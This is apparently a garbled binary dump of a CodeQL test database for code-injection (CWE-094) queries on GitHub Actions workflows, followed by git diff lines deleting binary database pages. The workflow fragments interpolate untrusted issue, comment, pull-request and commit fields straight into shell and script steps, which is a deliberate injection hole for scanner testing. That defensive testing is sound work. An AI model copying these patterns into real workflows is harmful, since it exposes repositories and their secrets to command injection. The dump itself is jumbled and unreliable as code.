-/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/Users/pwntester/src/github.com/githubsecuritylab/Users/pwntester/src/github.com/Users/pwntester/src/Users/pwntester/Users/nametag:yaml.org,2002:strIssue Workflowontag:yaml.org,2002:boolissuestypesopenededitedtag:yaml.org,2002:seq[opened, edited]tag:yaml.org,2002:maptypes: ... edited]issues:jobsredirectIssueruns-onubuntu-latestCheck for issue transferCheck f ... ransferenvcontent_analysis_responsecontent ... esponseundefinedcontent ... definedstepsusesactions/checkout@v2uses: a ... kout@v2Remove conflicting charsRemove ... g charsISSUE_TITLE${{github.event.issue.title}}${{gith ... title}}ISSUE_T ... title}}frabert/replace-string-action@1.2frabert ... ion@1.2idremove_quotationswithpattern""\""string${{env.ISSUE_TITLE}}replace-with-"-"pattern: "\""name: R ... g charsCheck infocheck-inforunecho "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV -|name: Check info- uses: ... kout@v2runs-on ... -latestredirectIssue:name: Issue Workflow/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.ymlCIpull_requestbranchesmain- mainbranches:pull_request:changed_filesTest changed-filesactions/checkout@v4fetch-depth0tag:yaml.org,2002:intfetch-depth: 0uses: a ... kout@v4Get changed fileschanged-filestj-actions/changed-files@v40tj-acti ... les@v40name: G ... d filesList all changed filesList al ... d filesfor file in ${{ steps.changed-files.outputs.all_changed_files }}; do - echo "$file was changed" -done -name: L ... d files- uses: ... kout@v4changed_files:name: CI/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.ymlissue_commentecho-chamberecho '${{ github.event.comment.body }}' -run: |- run: |echo-chamber2echo '${{ github.event.comment.body }}'echo '$ ... ody }}'run: ec ... ody }}'echo '${{ github.event.issue.body }}'echo '${{ github.event.issue.title }}'echo '$ ... tle }}'run: ec ... tle }}'- run: ... ody }}'echo-chamber3actions/github-script@v3actions ... ript@v3scriptconsole.log('${{ github.event.comment.body }}')console ... dy }}')script: ... dy }}')uses: a ... ript@v3console.log('${{ github.event.issue.body }}')console.log('${{ github.event.issue.title }}')console ... le }}')script: ... le }}')- uses: ... ript@v3echo-chamber:on: issue_comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml[opened,edited]permissions{}ISSUE_BODY${{github.event.issue.body}}${{gith ... .body}}outputsresult${{env.content_analysis_response}}${{env. ... ponse}}result: ... ponse}}Check Issue Titleactions-ecosystem/action-regex-match@v2actions ... atch@v2regex-matchtextregex^[A-Za-z0-9 _.]*$'^[A-Za-z0-9 _.]*$'flagsgtext: $ ... title}}name: C ... e TitleExit Jobif${{ steps.regex-match.outputs.match == '' }}${{ ste ... = '' }}echo "Bad Issue Title Format" -exit 1 -name: Exit Jobfrabert/replace-string-action@v2.5frabert ... on@v2.5'-'Check InformationISSUE_TITLE_PARSED${{steps.remove_quotations.outputs.replaced}}${{step ... laced}}ISSUE_T ... laced}}echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV -name: C ... rmationLabel issueenv.content_analysis_response != 'Valid'env.con ... 'Valid'curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels -name: Label issuename: C ... ransfercheckIssueInformationcheckIs ... rmationneeds.redirectIssue.outputs.result == 'Valid'needs.r ... 'Valid'Check for missing informationCheck f ... rmationneedsanalysis_responsegreetings_commentThank you for submitting the issue to us. We are sorry to see you get stuck with your workflow. While waiting for our team member to respond, please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information."Thank ... orry tocomment_introHello ${{ github.actor }}, thank you for submitting this issue! We are super excited that you want to help us make Dynamo all that it can be."Hello ... issue! needs_more_info_commentneeds_m ... commentHowever, we need some more information in order for the Dynamo team to investigate any further.\n\n"Howeve ... Dynamoclose_issue_commentHowever, given that there has been no additional information added, this issue will be closed for now. Please reopen and provide additional information if you wish the Dynamo team to investigate further.\n\n"Howeve ... added, info_neededAdditional information:\n - Filling in of the provided Template (What did you do, What did you expect to see, What did you see instead, What packages or external references (if any) were used)\n - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\n - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\n - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase said errors message in the screenshot)\n - Reproducible steps on how to create the error in question."Additi ... ion:\\nspecific_infoCan you please fill in the following to the best of your ability:"Can yo ... ility:"templateISSUE_TEMPLATE.md"ISSUE_TEMPLATE.md"issue_labelneeds more infoacceptable_missing_infoaccepta ... ng_info1analysi ... definedISSUE_B ... .body}}${{env.ISSUE_BODY}}${{ steps.remove_quotations.outputs.replaced }}${{ ste ... aced }}ISSUE_B ... aced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV -Close issueenv.analysis_response == 'Empty'env.ana ... 'Empty'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} -name: Close issueLabel and comment issueLabel a ... t issue((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened'))((env.a ... ened'))curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments -name: L ... t issueUnlabel updated issueUnlabel ... d issueenv.analysis_response == 'Valid' && github.event.action == 'edited'env.ana ... edited'echo urldecode ${{env.issue_label}} -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') -name: U ... d issueGreetingsenv.analysis_response == 'Valid' && github.event.action == 'opened'env.ana ... opened'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments -name: Greetingsif: nee ... 'Valid'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.ymlIssue Type Predicterissue_type_Predicterparsed_issue_bodyissue_json_stringis_wish_listCheckout Dynamo Reponame: C ... mo RepoRemove Quotesremove_quotes${{ github.event.issue.body }}${{ git ... body }}ISSUE_B ... body }}${{ env.ISSUE_BODY }}${{ env ... BODY }}name: Remove QuotesAnalyze Issue Body${{ steps.remove_quotes.outputs.replaced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV -name: A ... ue BodyClean Issue Bodyenv.analysis_response == 'Valid'env.ana ... 'Valid'ISSUE_BODY_PARSEDecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV -name: C ... ue BodyCreate Issue JSON StringCreate ... StringISSUE_NUMBER${{ github.event.issue.number }}${{ git ... mber }}${{ github.event.issue.title }}${{ git ... itle }}ISSUE_N ... mber }}echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV -name: C ... StringCheckout IssuesTypePredicter RepoCheckou ... er ReporepositoryDynamoDS/IssuesTypePredicterDynamoD ... edicterpathIssuesTypePredicterreposit ... edictername: C ... er RepoSetup dotnetactions/setup-dotnet@v4actions ... tnet@v4dotnet-version3.1.0'3.1.0'dotnet- ... '3.1.0'name: Setup dotnetBuild Issues Type PredicterBuild I ... edicterdotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release -cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . -name: B ... edicterRun Issues Type PredicterRun Iss ... edicterecho "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV -name: R ... edicterLabel issue as 'Wishlist'Label i ... shlist'env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1')env.ana ... ist:1')GH_TOKEN${{ secrets.DYNAMO_ISSUES_TOKEN }}${{ sec ... OKEN }}GH_TOKE ... OKEN }}gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} -name: L ... shlist'Label issue as 'NotMLEvaluated'Label i ... luated'env.analysis_response != 'Valid' || env.issue_json_string == ''env.ana ... g == ''gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} -name: L ... luated'- name: ... mo Reponame: I ... edicterissue_t ... dicter:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.ymlCherry pickingpushmaster- masterpush:cherry_pickdestination_branchinvalid'invalid'auto_branchauto-${{github.event.after}}'auto-$ ... fter}}'user_nameDynamo-Bot"Dynamo-Bot"destina ... nvalid'checkoutactions/checkout@v3name: checkoutfrabert/replace-string-action@v1.2frabert ... on@v1.2${{github.event.commits[0].message}}${{gith ... ssage}}ISSUE_B ... laced}}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV -env.destination_branch != 'invalid'env.des ... nvalid'Create PR to branchgit config user.name "${{env.user_name}}" -git fetch --all -git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} -git cherry-pick -x ${{github.event.after}} --strategy-option theirs -git push -u origin ${{env.auto_branch}} -hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" -GITHUB_TOKEN${{secrets.DYNAMOBOTTOKEN}}${{secr ... TOKEN}}pr_messageCherry-Pick from commit: ${{github.event.after}} - -### Cherry-picking: -[Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) - -### Pull request: -${{ env.ISSUE_BODY_PARSED }} -GITHUB_ ... TOKEN}}if: env ... nvalid'- name: checkoutcherry_pick:name: Cherry picking/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.ymldiscussionecho '${{ github.event.discussion.title }}'echo '${{ github.event.discussion.body }}'- run: ... tle }}'on: discussion/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.ymldiscussion_commenton: dis ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.ymlgollumecho '${{ github.event.pages[1].title }}'echo '${{ github.event.pages[11].title }}'echo '${{ github.event.pages[0].page_name }}'echo '$ ... ame }}'run: ec ... ame }}'echo '${{ github.event.pages[2222].page_name }}'echo '${{ toJSON(github.event.pages.*.title) }}'echo '$ ... le) }}'run: ec ... # safeon: gollum/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.ymlImage URL Processingcreated[created]types: [created]issue_comment:process-image-urlcontains(github.event.comment.body, 'https://github.com/github/release-assets/assets/')contain ... sets/')Checkoutname: CheckoutExtract and Clean Initial URLExtract ... ial URLextract-urlBODY${{ github.event.comment.body }}BODY: $ ... body }}echo "::set-output name=initial_url::$BODY" -name: E ... ial URLGet Redirected URL with DebuggingGet Red ... buggingcurlINITIAL_URL${{ steps.extract-url.outputs.initial_url }}${{ ste ... _url }}INITIAL ... _url }}echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT -name: G ... buggingTrim URL after PNGtrim-urlREDIRECTED_URL${{ steps.curl.outputs.redirected_url }}REDIREC ... _url }}echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" -name: T ... ter PNGUpdate Comment with New URLUpdate ... New URLNEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" -name: U ... New URL- name: Checkoutprocess-image-url:name: I ... cessing/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.ymljob1job_output${{ steps.step.outputs.value }}${{ ste ... alue }}job_out ... alue }}sourceRemove foo from changed filesRemove ... d filesstepmad9000/actions-find-and-replace-string@3mad9000 ... tring@3${{ steps.source.outputs.all_changed_files }}${{ ste ... iles }}findfoo'foo'replace''source: ... iles }}name: R ... d filesjob2${{ always() }}sinkecho ${{needs.job1.outputs.job_output}}echo ${ ... utput}}id: sink- id: sinkjob1:on: push/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yamlglobal_envtestglobal_ ... itle }}job_envjob_env ... itle }}echo '${{ env.global_env }}'echo '$ ... env }}'run: ec ... env }}'echo '${{ env.test }}'echo '$ ... est }}'run: ec ... est }}'echo '${{ env.job_env }}'echo '${{ env.step_env }}'step_envstep_en ... itle }}env:on: issues/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.ymlCodeQL Auto Language"CodeQL ... nguage"[ main ]branches: [ main ]schedulecron17 19 * * 6'17 19 * * 6'cron: '17 19 * * 6'- cron: ... * * 6'create-matrixmatrix${{ steps.set-matrix.outputs.all_changed_files }}matrix: ... iles }}set-matrix- name: ... d filesanalyze${{ needs.create-matrix.outputs.matrix != '[]' }}${{ nee ... '[]' }}Analyzeactionsreadcontentssecurity-eventswriteactions: readstrategyfail-fastfalselanguage${{ fromJSON(needs.create-matrix.outputs.matrix) }}${{ fro ... rix) }}languag ... rix) }}fail-fast: falseCheckout repositoryname: C ... ository${{ matrix.language }} -| run: | - name: ... ositoryneeds: create-matrixcreate-matrix:name: " ... nguage"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.ymlsimple1${{ github.event.head_commit.message }}${{ git ... sage }}source: ... sage }}id: source no-stepecho "test=foo" >> "$GITHUB_OUTPUT"echo "t ... OUTPUT"id: no-stepecho "echo ${{steps.no-step.outputs.foo}}" -- id: source simple1:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.ymlfoobarfoo'foobarfoo'source: 'foobarfoo'for file in ${{ steps.step.outputs.value }}; do - echo "$file was changed" -done -/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.ymlpull_request_reviewecho '${{ github.event.pull_request.title }}'echo '${{ github.event.pull_request.body }}'echo '${{ github.event.pull_request.head.label }}'echo '$ ... bel }}'run: ec ... bel }}'echo '${{ github.event.pull_request.head.repo.default_branch }}'echo '$ ... nch }}'run: ec ... nch }}'echo '${{ github.event.pull_request.head.repo.description }}'echo '$ ... ion }}'run: ec ... ion }}'echo '${{ github.event.pull_request.head.repo.homepage }}'echo '$ ... age }}'run: ec ... age }}'echo '${{ github.event.pull_request.head.ref }}'echo '$ ... ref }}'run: ec ... ref }}'echo '${{ github.event.review.body }}'on: pul ... _review/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.ymlpull_request_review_commentpull_re ... commenton: pul ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.ymlpull_request_targetrun: ec ... definedecho '${{ github.head_ref }}'- run: ... definedon: pul ... _target/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.ymlecho '${{ github.event.commits[11].message }}'echo '${{ github.event.commits[11].author.email }}'echo '$ ... ail }}'run: ec ... ail }}'echo '${{ github.event.commits[11].author.name }}'echo '${{ github.event.head_commit.message }}'echo '${{ github.event.head_commit.author.email }}'echo '${{ github.event.head_commit.author.name }}'echo '${{ github.event.head_commit.committer.email }}'echo '${{ github.event.head_commit.committer.name }}'echo '${{ github.event.commits[11].committer.email }}'echo '${{ github.event.commits[11].committer.name }}'- run: ... age }}'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.ymlsummaryid: summaryflowecho "${{steps.summary.outputs.value}}" -id: flow no-flowecho "${{steps.summary.outputs.foo}}" -id: no-flow- id: summary/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml[pull_r ... equest]for file in ${{ steps.source.outputs.all_changed_files_count }}; do - echo "$file was changed" -done -/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml${{ steps.step2.outputs.test }}${{ ste ... test }}job_out ... test }}step0id: step0 step1${{ steps.step0.outputs.value}}${{ ste ... value}}BODY: $ ... value}}shellpowershellWrite-Output "::set-output name=MSG::$ENV{BODY}" -id: step1step2MSG${{steps.step1.outputs.MSG}}${{step ... s.MSG}}MSG: ${ ... s.MSG}}echo "test=$MSG" >> "$GITHUB_OUTPUT"id: step2run: ec ... utput}}- run: ... utput}}/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.ymlworkflow_runworkflows[test]workflows: [test]workflow_run:echo '${{ github.event.workflow_run.display_title }}'echo '${{ github.event.workflow_run.head_commit.message }}'echo '${{ github.event.workflow_run.head_commit.author.email }}'echo '${{ github.event.workflow_run.head_commit.author.name }}'echo '${{ github.event.workflow_run.head_commit.committer.email }}'echo '${{ github.event.workflow_run.head_commit.committer.name }}'echo '${{ github.event.workflow_run.head_branch }}'echo '${{ github.event.workflow_run.head_repository.description }}'on:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1'test'descriptionbrandingiconcoloricon: 'test'inputsrequireddefaultdescription: testtest:runsusingcomposite"composite"using: "composite"name: 'test'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2Hello World'Hello World'Greet someone and record the time'Greet ... e time'who-to-greetWho to greet'Who to greet'trueWorld'World'descrip ... greet'who-to- ... f inputtimeThe time we greeted you'The ti ... ed you'descrip ... ed you'time: # id of outputdocker'docker'imageDockerfile'Dockerfile'args${{ inputs.who-to-greet }}${{ inp ... reet }}- ${{ i ... reet }}using: 'docker'name: 'Hello World'hSt¹>w \ No newline at end of file diff --git a/db/db-yaml/default/pools/1/buckets/info b/db/db-yaml/default/pools/1/buckets/info deleted file mode 100644 index 0111728636533e2c31d7b0489e64f46bcd4d6cf2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q diff --git a/db/db-yaml/default/pools/1/buckets/page-000000 b/db/db-yaml/default/pools/1/buckets/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/ids1/info b/db/db-yaml/default/pools/1/ids1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/indices1/info b/db/db-yaml/default/pools/1/indices1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/info b/db/db-yaml/default/pools/1/info deleted file mode 100644 index 9b4ec24220f77cd70a002420d93e390bfc4c1f7a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41 ccmZQz00U+q$+QN785kjAU>eL`E;&&F04bXS)Bpeg diff --git a/db/db-yaml/default/pools/1/metadata/info b/db/db-yaml/default/pools/1/metadata/info deleted file mode 100644 index 9cdb710dfd9490f67f5103cbab69eb12829f96b4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 diff --git a/db/db-yaml/default/pools/1/metadata/page-000000 b/db/db-yaml/default/pools/1/metadata/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/pageDump/page-000000000 b/db/db-yaml/default/pools/1/pageDump/page-000000000 deleted file mode 100644 index 7bccaeb20c898fd660036bab54ae98c20280d0a3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 